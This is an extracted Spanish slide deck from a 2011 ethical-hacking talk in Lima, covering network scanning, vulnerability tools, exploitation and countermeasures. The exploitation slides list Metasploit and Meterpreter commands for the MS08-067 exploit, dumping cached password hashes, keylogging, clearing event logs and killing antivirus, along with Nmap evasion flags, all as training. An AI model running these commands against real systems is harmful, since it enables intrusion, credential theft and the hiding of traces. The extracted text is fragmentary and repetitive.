Lima, 24 Setiembre, 2011

Tamaño: px

Comenzar la demostración a partir de la página:

Download "Lima, 24 Setiembre, 2011 OMARC320@GMAIL.COM"

Elisa Morales Castellanos
hace 8 años
Vistas:

1 Lima, 24 Setiembre, 2011

2 AGENDA 1 Acerca del autor 2 Introducción al Ethical Hacking 3 Ethical Hacking vs Pentesting 4 Escaneo de red organizacional 5 Análisis de Vulnerabilidades 6 Explotación de Vulnerabilidades 7 Pentesting 8 Prevención y contramedidas Omar Palomino omarc320@gmail.com 2

Análisis de Vulnerabilidades 6 Explotación de Vulnerabilidades 7

3 1 Acerca del autor 10 años de experiencia en seguridad de información Psicólogo que aun no comienza sus estudios. Maestrista de Ing. de Computación y Sistemas Consultor en Seguridad de información, CEH Escritor en mis tiempos libres: Omar Palomino omarc320@gmail.com 3

de Computación y Sistemas Consultor en Seguridad de información, CEH

4 2 Introducción al Ethical Hacking Ethical Hacking = Hacker bueno Prevención de ataques mal intencionados. Análisis de vulnerabilidades preventivos Cumplimientos de normas: NTP, ISO Uso de metodologías: OSSMT, OWASP, etc Cumplimiento de la legislación peruana Omar Palomino omarc320@hotmail.com 4

Análisis de vulnerabilidades preventivos Cumplimientos de normas: NTP, ISO

5 3 Ethical Hacking vs Pentesting Omar Palomino 5

6 3 Ethical Hacking vs Pentesting Omar Palomino 6

7 4 Escaneo de red organizacional Uso de herramientas: Nmap: La herramienta por excelencia. Tracert: Examina las rutas de llegada Consulta a los DNS ( Consúltale a Google Tools: * Maltego (veamos un ejemplo) Omar Palomino omarc320@gmail.com 7

Tracert: Examina las rutas de llegada Consulta a los DNS

8 4 Escaneo de red organizacional NMAP: Root# nmap sv O T3 PN F <target> Omar Palomino omarc320@gmail.com 8

9 4 Escaneo de red organizacional NMAP Avanzado: TCP Syn Scan SYN SYN / ACK ACK Nmap reconoce que hay una conexión abierta: Bingo Omar Palomino omarc320@gmail.com 9

10 4 Escaneo de red organizacional NMAP Avanzado: TCP Syn Scan SYN SYN / ACK ACK Nmap NO reconoce que hay una conexión abierta Omar Palomino omarc320@gmail.com 10

11 4 Escaneo de red organizacional NMAP Avanzado: TCP Syn Scan Root# nmap ss v <target> SYN SYN / ACK RST Nmap reconoce que hay una conexión abierta: BINGO! Omar Palomino omarc320@gmail.com 11

12 4 Escaneo de red organizacional NMAP Avanzado: Técnicas evasivas de IPS/IDS - F: Fragmentar paquetes - sf: FIN Scan (Stealth Scan) Omar Palomino omarc320@gmail.com 12

13 4 Escaneo de red organizacional: Ing. Social Llamadas telefónicas Piggybacking Escritorios limpios Dumpster diving Phishing Redes Sociales MALTEGO Omar Palomino 13

14 4 Escaneo de red organizacional: Ing. Social Omar Palomino 14

15 5 Análisis de Vulnerabilidades Nessus Qualys Acunetix Vulnerabilidades en S.O y Aplicaciones Shadow Security Scanner Bactrack Omar Palomino omarc320@gmail.com 15

16 5 Análisis de Vulnerabilidades Nessus Omar Palomino 16

17 6 Explotación de Vulnerabilidades Metasploit msf > use windows/smb/ms08_067_netapi msf exploit(ms08_067_netapi) > set payload windows/vncinject/bind_tcp payload => windows/vncinject/bind_tcp msf exploit(ms08_067_netapi) > show options msf exploit(ms08_067_netapi) > set RHOST RHOST => msf exploit(ms08_067_netapi) > exploit Omar Palomino 17

windows/vncinject/bind_tcp msf exploit(ms08_067_netapi) > show options msf

18 6 Explotación de Vulnerabilidades Metasploit Omar Palomino 18

19 6 Explotación de Vulnerabilidades Armitage Omar Palomino 19

20 6 Explotación de Vulnerabilidades Armitage Meterpreter: Familia de plugins avanzados de los mismos creadores de Metasploit Framework, que se utiliza sobre sistemas comprometidos y tienen como característica fundamental que todo es cargado en memoria sin crear ningún proceso adicional ni dejar rastros PS IDLETIME SYSINFO Omar Palomino omarc320@gmail.com 20

y tienen como característica fundamental que todo es cargado en memoria sin crear ningún

21 6 Explotación de Vulnerabilidades Armitage PS IDLETIME SYSINFO HASHDUMP Omar Palomino 21

22 6 Explotación de Vulnerabilidades Rainbow Tables Almacenamiento contraseñas Windows: LN Hash/NTLM Hash por defecto SUPERPASSWORD SUPERPA SSWORD e52cac67419a9a224a3b108f3fa6cb6d e52cac67419a9a22 4a3b108f3fa6cb6d Omar Palomino 22

23 6 Explotación de Vulnerabilidades Rainbow Tables Omar Palomino 23

24 6 Explotación de Vulnerabilidades Rainbow Tables Almacenamiento contraseñas del Active Directory Meterpreter> mkdir C:\cache Meterpreter> upload /root/cache C:\cache Meterpreter> cd C:\cache Meterpreter> ls C:\cachedump.exe > salida.txt Meterpreter> download salida.txt --wordlist:password.lst -format:mscash salida.txt Loaded 2 password hashes with 2 different salts (M$ Cache Hash [Generic 1x]) password (mpalomino) superpassword (opalomino) Omar Palomino omarc320@gmail.com 24

25 6 Explotación de Vulnerabilidades Armitage Con Metasploit (y con Armitage) podemos realizar sniffing de dos tipos: SNIFFING Interfaces de red TECLADO Meterpreter> ps Meterpreter> migrate 1736 Meterpreter> getpid Meterpreter> keyscan_start Meterpreter> keyscan_dump Meterpreter> keyscan_stop Omar Palomino 25

26 6 Explotación de Vulnerabilidades Armitage Screenshot Webcam Clearev Run get_application_list Winenum Download Run enum_shares Excute f cmd.exe i -t Run killav Run service_maneger -l Omar Palomino omarc320@gmail.com 26

27 6 Explotación de Vulnerabilidades Vistumbler Android: Wifiscan, Wigle Wifi Antena: Chipset Realtek o Atheros Vulnerabilidades en REDES INALAMBRICAS: Encontrar vulnerables: Cifrado WEP Filtrado MAC Wardriving redes Airmon Omar Palomino omarc320@gmail.com 27

28 6 Explotación de Vulnerabilidades Más de 30 redes vulnerables! Omar Palomino 28

29 6 Explotación de Vulnerabilidades Más de 20 redes vulnerables! Omar Palomino 29

30 6 Explotación de Vulnerabilidades AndroidScreenCast:./adb kill-server./adb star-server Requerimientos para auditoría wireless: Chipset Realtek, Atheros Antena con potencia Diversas herramientas: airmon Omar Palomino 30

31 6 Explotación de Vulnerabilidades Vulnerabilidades en la RED: Encontrar información importante viajando en la red. Contraseñas Conversaciones Acceso a segmentos de red no autorizado. Ettercap Wireshark Cain y Abel SSLTrip Metasploit Airmon Omar Palomino omarc320@gmail.com 31

8 Prevención y contramedidas El único sistema seguro es aquél que está apagado en el interior de un bloque de hormigón protegido en una habitación sellada

32 8 Prevención y contramedidas El único sistema seguro es aquél que está apagado en el interior de un bloque de hormigón protegido en una habitación sellada y rodeada por guardias armados. Eric Raymond La Seguridad no es solo un proceso Tecnológico Es un proceso Organizacional Omar Palomino omarc320@gmail.com 32

FACTOR HUMANO * Campañas de concientización * Pruebas de ingeniería social * Charlas y reuniones.

33 8 Prevención y contramedidas FACTOR TÉCNICO * Firewall capa 3 * Firewall de aplicaciones * Firewall de Bases de datos * IPS/IDS * Correlación de eventos. FACTOR HUMANO * Campañas de concientización * Pruebas de ingeniería social * Charlas y reuniones. SISTEMA DE GESTIÓN * Sistema de Gestión de seguridad de información (SGSI) * ISO /17799 * Gestión de Riesgos (ISO 27005) * ITIL, COBIT Omar Palomino omarc320@gmail.com 33

34 Lima, 24 Setiembre, 2011

Documentos relacionados

AGENDA. Introducción al Ethical Hacking. Ethical Hacking vs Pentesting. Escaneo de red organizacional. Análisis de Vulnerabilidades

AGENDA. Introducción al Ethical Hacking. Ethical Hacking vs Pentesting. Escaneo de red organizacional. Análisis de Vulnerabilidades OMARC320@GMAIL.COM AGENDA 1 Acerca del autor 2 Introducción al Ethical Hacking 3 Ethical Hacking vs Pentesting 4 Escaneo de red organizacional 5 Análisis de Vulnerabilidades 6 Explotación de Vulnerabilidades